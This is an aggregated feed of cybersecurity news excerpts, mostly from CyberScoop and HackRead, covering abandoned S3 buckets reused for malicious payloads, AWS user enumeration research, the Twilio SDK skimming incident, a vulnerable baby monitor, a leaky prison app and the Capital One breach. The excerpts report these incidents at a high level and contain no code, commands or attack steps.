Here’s all the ways an abandoned cloud instance can cause security issues

Research released Tuesday by watchTowr shows how easy an old storage bucket can be repurposed by malicious attackers.

The post Here’s all the ways an abandoned cloud instance can cause security issues appeared first on CyberScoop.

Continue reading Here’s all the ways an abandoned cloud instance can cause security issues

Supply Chain Attack: Abandoned S3 Buckets Used for Malicious Payloads

By Deeba Ahmed
Threat actors have been taking over abandoned S3 buckets to launch malicious binaries, steal login credentials and more.
This is a post from HackRead.com Read the original post: Supply Chain Attack: Abandoned S3 Buckets Used for Maliciou… Continue reading Supply Chain Attack: Abandoned S3 Buckets Used for Malicious Payloads

Sneaky recon on roster of AWS users is possible, Unit 42 says

Knowing exactly who manages a certain cloud service can be valuable information for malicious hackers, and a cybersecurity company says it has found that kind of weakness in products run by one of the biggest cloud providers. More than 20 application programming interfaces (API) associated with 16 Amazon Web Services products can be abused to give up basic information about users and their roles, according to Unit 42, the research arm of cybersecurity giant Palo Alto Networks. “A malicious actor may obtain the roster of an account, learn the organization’s internal structure” and then perhaps “launch targeted attacks against individuals,” Unit 42 researcher Jay Chen says in a report released Tuesday morning. Palo Alto Networks says AWS gave permission to release the research. The problem is within a feature that validates “resource-based policies” for things like the commonly used Amazon Simple Storage Service (S3), Unit 42 says. A resource-based policy is basically a […]

The post Sneaky recon on roster of AWS users is possible, Unit 42 says appeared first on CyberScoop.

Continue reading Sneaky recon on roster of AWS users is possible, Unit 42 says

Twilio breach spotlights struggle to keep corporate software kits out of the wrong hands

The security team at Twilio, a cloud communications company that claimed over $1 billion in revenue last year, could breathe a sigh of relief on Sunday night. Earlier in the day, someone had manipulated the code in a software product that Twilio customers use to route calls and other communications. The breach resembled a Magecart-style attack that skims websites for users’ financial data. Twilio cleaned up the code hours later, and said there was no sign the attackers had accessed customer data. But the damage could have been worse if the attack had been targeted, multiple security experts told CyberScoop. With access to the code, which was sitting in an unsecured Amazon cloud storage service known as an S3 bucket, the attackers could have conducted phishing attacks or distributed malware through the platform, according to Yonathan Klijnsma, head of threat research at security company RiskIQ. Dave Kennedy, founder of cybersecurity […]

The post Twilio breach spotlights struggle to keep corporate software kits out of the wrong hands appeared first on CyberScoop.

Continue reading Twilio breach spotlights struggle to keep corporate software kits out of the wrong hands

RSAC 2020: Another Smart Baby Monitor Vulnerable to Remote Hackers

A popular baby monitor has been found riddled with vulnerabilities that give attackers full access to personal information and sensitive video footage. Continue reading RSAC 2020: Another Smart Baby Monitor Vulnerable to Remote Hackers

Data about inmates and jail staff spilled by leaky prison app

A web-mapping project came across detainees’ prescriptions and other PII that could be used by identity thieves to victimize prisoners. Continue reading Data about inmates and jail staff spilled by leaky prison app

What Capital One’s cybersecurity team did (and did not) get right

There was no months-old, unpatched Apache flaw. A S3 bucket wasn’t publicly accessible to anyone with an internet connection. There was no effort to hide what happened behind the company’s bug bounty program. When taken at face value, the Capital One breach looks awfully similar to other massive security failures that have made national news in the past few years. But while people fixate on the amount of information taken, there are some in cybersecurity circles that see a silver lining in the way the bank has handled the incident. Multiple security experts told CyberScoop that while the incident is clearly severe and there are still questions that need to be answered, actions taken by the Virginia-based bank — who did not respond to CyberScoop’s request for comment — prevented this breach from becoming another example of extreme corporate cybersecurity negligence. “While it’s tempting to knock Capital One for this […]

The post What Capital One’s cybersecurity team did (and did not) get right appeared first on CyberScoop.

Continue reading What Capital One’s cybersecurity team did (and did not) get right